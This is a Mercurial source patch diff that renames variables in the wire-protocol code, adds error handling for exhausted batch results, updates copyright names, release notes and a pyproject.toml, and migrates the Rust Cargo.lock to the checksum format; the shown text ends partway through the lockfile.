diff --git a/mercurial/wireprotoserver.py b/mercurial/wireprotoserver.py --- a/mercurial/wireprotoserver.py +++ b/mercurial/wireprotoserver.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. diff --git a/mercurial/wireprotov1peer.py b/mercurial/wireprotov1peer.py --- a/mercurial/wireprotov1peer.py +++ b/mercurial/wireprotov1peer.py @@ -1,6 +1,6 @@ # wireprotov1peer.py - Client-side functionality for wire protocol version 1. # -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -43,14 +43,14 @@ @batchable def sample(self, one, two=None): # Build list of encoded arguments suitable for your wire protocol: - encargs = [('one', encode(one),), ('two', encode(two),)] + encoded_args = [('one', encode(one),), ('two', encode(two),)] # Create future for injection of encoded result: - encresref = future() + encoded_res_future = future() # Return encoded arguments and future: - yield encargs, encresref + yield encoded_args, encoded_res_future # Assuming the future to be filled with the result from the batched # request now. 
Decode it: - yield decode(encresref.value) + yield decode(encoded_res_future.value) The decorator returns a function which wraps this coroutine as a plain method, but adds the original method as an attribute called "batchable", @@ -60,12 +60,12 @@ def plain(*args, **opts): batchable = f(*args, **opts) - encargsorres, encresref = next(batchable) - if not encresref: - return encargsorres # a local result in this case + encoded_args_or_res, encoded_res_future = next(batchable) + if not encoded_res_future: + return encoded_args_or_res # a local result in this case self = args[0] cmd = pycompat.bytesurl(f.__name__) # ensure cmd is ascii bytestr - encresref.set(self._submitone(cmd, encargsorres)) + encoded_res_future.set(self._submitone(cmd, encoded_args_or_res)) return next(batchable) setattr(plain, 'batchable', f) @@ -257,15 +257,15 @@ # Encoded arguments and future holding remote result. try: - encargsorres, fremote = next(batchable) + encoded_args_or_res, fremote = next(batchable) except Exception: pycompat.future_set_exception_info(f, sys.exc_info()[1:]) return if not fremote: - f.set_result(encargsorres) + f.set_result(encoded_args_or_res) else: - requests.append((command, encargsorres)) + requests.append((command, encoded_args_or_res)) states.append((command, f, batchable, fremote)) if not requests: @@ -310,7 +310,7 @@ if not f.done(): f.set_exception( error.ResponseError( - _(b'unfulfilled batch command response') + _(b'unfulfilled batch command response'), None ) ) @@ -322,16 +322,27 @@ for command, f, batchable, fremote in states: # Grab raw result off the wire and teach the internal future # about it. - remoteresult = next(wireresults) - fremote.set(remoteresult) + try: + remoteresult = next(wireresults) + except StopIteration: + # This can happen in particular because next(batchable) + # in the previous iteration can call peer._abort, which + # may close the peer. 
+ f.set_exception( + error.ResponseError( + _(b'unfulfilled batch command response'), None + ) + ) + else: + fremote.set(remoteresult) - # And ask the coroutine to decode that value. - try: - result = next(batchable) - except Exception: - pycompat.future_set_exception_info(f, sys.exc_info()[1:]) - else: - f.set_result(result) + # And ask the coroutine to decode that value. + try: + result = next(batchable) + except Exception: + pycompat.future_set_exception_info(f, sys.exc_info()[1:]) + else: + f.set_result(result) @interfaceutil.implementer( diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -1,6 +1,6 @@ # wireprotov1server.py - Wire protocol version 1 server functionality # -# Copyright 2005-2010 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -27,6 +27,7 @@ exchange, pushkey as pushkeymod, pycompat, + requirements as requirementsmod, streamclone, util, wireprototypes, @@ -108,7 +109,7 @@ 4. 
server.bundle1 """ ui = repo.ui - gd = b'generaldelta' in repo.requirements + gd = requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements if gd: v = ui.configbool(b'server', b'bundle1gd.%s' % action) @@ -310,7 +311,7 @@ caps.append(b'stream-preferred') requiredformats = repo.requirements & repo.supportedformats # if our local revlogs are just revlogv1, add 'stream' cap - if not requiredformats - {b'revlogv1'}: + if not requiredformats - {requirementsmod.REVLOGV1_REQUIREMENT}: caps.append(b'stream') # otherwise, add 'streamreqs' detailing our local revlog format else: diff --git a/mercurial/wireprotov2server.py b/mercurial/wireprotov2server.py --- a/mercurial/wireprotov2server.py +++ b/mercurial/wireprotov2server.py @@ -1,5 +1,5 @@ # Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net> -# Copyright 2005-2007 Matt Mackall <mpm@selenic.com> +# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com> # # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. @@ -1582,7 +1582,8 @@ # TODO this is a bunch of storage layer interface abstractions because # it assumes revlogs. - for name, encodedname, size in topfiles: + for rl_type, name, encodedname, size in topfiles: + # XXX use the `rl_type` for that if b'changelog' in files and name.startswith(b'00changelog'): pass elif b'manifestlog' in files and name.startswith(b'00manifest'): diff --git a/mercurial/worker.py b/mercurial/worker.py --- a/mercurial/worker.py +++ b/mercurial/worker.py @@ -442,7 +442,7 @@ we ever write workers that need to preserve grouping in input we should consider allowing callers to specify a partition strategy. - mpm is not a fan of this partitioning strategy when files are involved. + olivia is not a fan of this partitioning strategy when files are involved. 
In his words: Single-threaded Mercurial makes a point of creating and visiting diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,18 @@ +[build-system] +requires = ["setuptools", "wheel"] +build-backend = "setuptools.build_meta" + +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/relnotes/5.7 b/relnotes/5.7 --- a/relnotes/5.7 +++ b/relnotes/5.7 @@ -17,6 +17,8 @@ can be e.g. `rebase`. As part of this effort, the default format from `hg rebase` was reorganized a bit. + * `hg purge` is now a core command using `--confirm` by default. + * `hg diff` and `hg extdiff` now support `--from <rev>` and `--to <rev>` arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been deprecated. @@ -43,6 +45,9 @@ * The `branchmap` cache is updated more intelligently and can be significantly faster for repositories with many branches and changesets. + * The `rev-branch-cache` is now updated incrementally whenever changesets + are added. + == New Experimental Features == @@ -64,4 +69,5 @@ == Internal API Changes == - + * `changelog.branchinfo` is deprecated and will be removed after 5.8. + It is superseded by `changelogrevision.branchinfo`. diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -1,8 +1,24 @@ == New Features == + + * `hg purge` is now a core command using `--confirm` by default. + + * The `rev-branch-cache` is now updated incrementally whenever changesets + are added. + * The new options `experimental.bundlecompthreads` and + `experimental.bundlecompthreads.<engine>` can be used to instruct + the compression engines for bundle operations to use multiple threads + for compression. The default is single threaded operation. Currently + only supported for zstd. 
== New Experimental Features == + * There's a new `diff.merge` config option to show the changes + relative to an automerge for merge changesets. This makes it + easier to detect and review manual changes performed in merge + changesets. It is supported by `hg diff --change`, `hg log -p` + `hg incoming -p`, and `hg outgoing -p` so far. + == Bug Fixes == @@ -10,7 +26,24 @@ == Backwards Compatibility Changes == + * In normal repositories, the first parent of a changeset is not null, + unless both parents are null (like the first changeset). Some legacy + repositories violate this condition. The revlog code will now + silentely swap the parents if this condition is tested. This can + change the output of `hg log` when explicitly asking for first or + second parent. + == Internal API Changes == + * `changelog.branchinfo` is deprecated and will be removed after 5.8. + It is superseded by `changelogrevision.branchinfo`. + * Callbacks for revlog.addgroup and the changelog._nodeduplicatecallback hook + now get a revision number as argument instead of a node. + + * revlog.addrevision returns the revision number instead of the node. + + * `nodes.nullid` and related constants are being phased out as part of + the deprecation of SHA1. Repository instances and related classes + provide access via `nodeconstants` and in some cases `nullid` attributes. 
diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -4,1009 +4,1101 @@ name = "adler" version = "0.2.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e" [[package]] name = "aho-corasick" version = "0.7.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5" dependencies = [ - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", + "memchr", ] [[package]] name = "ansi_term" version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b" dependencies = [ - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "winapi", ] [[package]] name = "atty" version = "0.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8" dependencies = [ - "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "hermit-abi", + "libc", + "winapi", ] [[package]] name = "autocfg" version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a" [[package]] name = "bitflags" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693" [[package]] name = "bitmaps" version = "2.1.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2" dependencies = [ - "typenum 1.12.0 
(registry+https://github.com/rust-lang/crates.io-index)", + "typenum", ] [[package]] name = "byteorder" version = "1.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de" + +[[package]] +name = "bytes-cast" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52" +dependencies = [ + "bytes-cast-derive", +] + +[[package]] +name = "bytes-cast-derive" +version = "0.1.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb" +dependencies = [ + "proc-macro2", + "quote", + "syn", +] [[package]] name = "cc" version = "1.0.66" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48" dependencies = [ - "jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)", + "jobserver", ] [[package]] name = "cfg-if" version = "0.1.10" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822" [[package]] name = "cfg-if" version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd" + +[[package]] +name = "chrono" +version = "0.4.19" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73" +dependencies = [ + "libc", + "num-integer", + "num-traits", + "time", + "winapi", +] [[package]] name = "clap" version = "2.33.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002" dependencies = [ - "ansi_term 0.11.0 
(registry+https://github.com/rust-lang/crates.io-index)", - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)", - "textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)", - "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)", - "vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)", + "ansi_term", + "atty", + "bitflags", + "strsim", + "textwrap", + "unicode-width", + "vec_map", ] [[package]] name = "const_fn" version = "0.4.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826" [[package]] name = "cpython" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f11357af68648b6a227e7e2384d439cec8595de65970f45e3f7f4b2600be472" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "num-traits", + "paste", + "python27-sys", + "python3-sys", ] [[package]] name = "crc32fast" version = "1.2.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", ] [[package]] name = "crossbeam-channel" version = "0.4.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87" dependencies = [ - "crossbeam-utils 0.7.2 
(registry+https://github.com/rust-lang/crates.io-index)", - "maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)", + "crossbeam-utils 0.7.2", + "maybe-uninit", ] [[package]] name = "crossbeam-channel" version = "0.5.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-deque" version = "0.8.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crossbeam-epoch", + "crossbeam-utils 0.8.1", ] [[package]] name = "crossbeam-epoch" version = "0.9.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "const_fn", + "crossbeam-utils 0.8.1", + "lazy_static", + "memoffset", + "scopeguard", ] [[package]] name = "crossbeam-utils" version = "0.7.2" source = 
"registry+https://github.com/rust-lang/crates.io-index" +checksum = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 0.1.10", + "lazy_static", ] [[package]] name = "crossbeam-utils" version = "0.8.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", + "cfg-if 1.0.0", + "lazy_static", ] [[package]] name = "ctor" version = "0.1.16" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484" dependencies = [ - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "quote", + "syn", +] + +[[package]] +name = "derive_more" +version = "0.99.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c" +dependencies = [ + "proc-macro2", + "quote", + "syn", ] [[package]] name = "difference" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198" [[package]] name = "either" version = "1.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457" [[package]] name = "env_logger" version = "0.7.1" 
source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36" dependencies = [ - "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)", - "humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", + "atty", + "humantime", + "log", + "regex", + "termcolor", ] [[package]] name = "flate2" version = "1.0.19" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129" dependencies = [ - "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)", - "miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 1.0.0", + "crc32fast", + "libc", + "libz-sys", + "miniz_oxide", ] [[package]] name = "format-bytes" -version = "0.1.3" +version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1c4e89040c7fd7b4e6ba2820ac705a45def8a0c098ec78d170ae88f1ef1d5762" dependencies = [ - "format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)", + "format-bytes-macros", + "proc-macro-hack", ] [[package]] name = "format-bytes-macros" -version = "0.1.2" +version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d" dependencies = [ - "proc-macro-hack 0.5.19 
(registry+https://github.com/rust-lang/crates.io-index)", - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro-hack", + "proc-macro2", + "quote", + "syn", ] [[package]] name = "fuchsia-cprng" version = "0.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba" [[package]] name = "gcc" version = "0.3.55" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2" [[package]] name = "getrandom" version = "0.1.15" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", + "libc", + "wasi 0.9.0+wasi-snapshot-preview1", ] [[package]] name = "glob" version = "0.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574" [[package]] name = "hermit-abi" version = "0.1.17" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] -name = "hex" -version = "0.4.2" -source = "registry+https://github.com/rust-lang/crates.io-index" - -[[package]] name = "hg-core" version = "0.1.0" dependencies = [ - "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "clap 
2.33.3 (registry+https://github.com/rust-lang/crates.io-index)", - "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)", - "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)", - "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)", - "hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)", - "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", - "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)", - "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)", - "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)", - "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)", - "rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)", - "same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)", - "tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)", - "zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)", + "byteorder", + "bytes-cast", + "clap", + "crossbeam-channel 0.4.4", + "derive_more", + "flate2", + "format-bytes", + "home", + "im-rc", + "lazy_static", + "log", + "memmap", + "micro-timer", + "pretty_assertions", + "rand 0.7.3", + "rand_distr", + "rand_pcg", + "rayon", + "regex", + "rust-crypto", + "same-file", + 
"tempfile", + "twox-hash", + "zstd", ] [[package]] name = "hg-cpython" version = "0.1.0" dependencies = [ - "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)", - "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)", - "hg-core 0.1.0", - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cpython", + "crossbeam-channel 0.4.4", + "env_logger", + "hg-core", + "libc", + "log", +] + +[[package]] +name = "home" +version = "0.5.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654" +dependencies = [ + "winapi", ] [[package]] name = "humantime" version = "1.3.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f" dependencies = [ - "quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)", + "quick-error", ] [[package]] name = "im-rc" version = "15.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f" dependencies = [ - "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)", - "rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)", - "sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)", - "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)", - "version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)", + "bitmaps", + "rand_core 0.5.1", + "rand_xoshiro", + "sized-chunks", + "typenum", + "version_check", ] [[package]] name = "itertools" version = "0.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b" dependencies = [ - "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)", + "either", ] [[package]] name = "jobserver" version = "0.1.21" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", ] [[package]] name = "lazy_static" version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646" [[package]] name = "libc" version = "0.2.81" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb" [[package]] name = "libz-sys" version = "1.1.2" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655" dependencies = [ - "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)", - "pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)", - "vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)", + "cc", + "pkg-config", + "vcpkg", ] [[package]] name = "log" version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b" dependencies = [ - "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)", + "cfg-if 0.1.10", ] [[package]] name = "maybe-uninit" version = "2.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00" [[package]] name = "memchr" version = "2.3.4" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = 
"0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525" [[package]] name = "memmap" version = "0.7.0" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b" dependencies = [ - "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)", - "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)", + "libc", + "winapi", ] [[package]] name = "memoffset" version = "0.6.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "157b4208e3059a8f9e78d559edc658e13df41410cb3ae03979c83130067fdd87" dependencies = [ - "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)", + "autocfg", ] [[package]] name = "micro-timer" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2620153e1d903d26b72b89f0e9c48d8c4756cba941c185461dddc234980c298c" dependencies = [ - "micro-timer-macros 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", + "micro-timer-macros", + "scopeguard", ] [[package]] name = "micro-timer-macros" version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "e28a3473e6abd6e9aab36aaeef32ad22ae0bd34e79f376643594c2b152ec1c5d" dependencies = [ - "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)", - "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)", - "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)", - "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)", + "proc-macro2", + "quote", + "scopeguard", + "syn", ] [[package]] name = "miniz_oxide" version = "0.4.3" source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0f2d26ec3309788e423cfbf68ad1800f061638098d76a83681af979dc4eda19d" dependencies = [ - "adler 0.2.3 
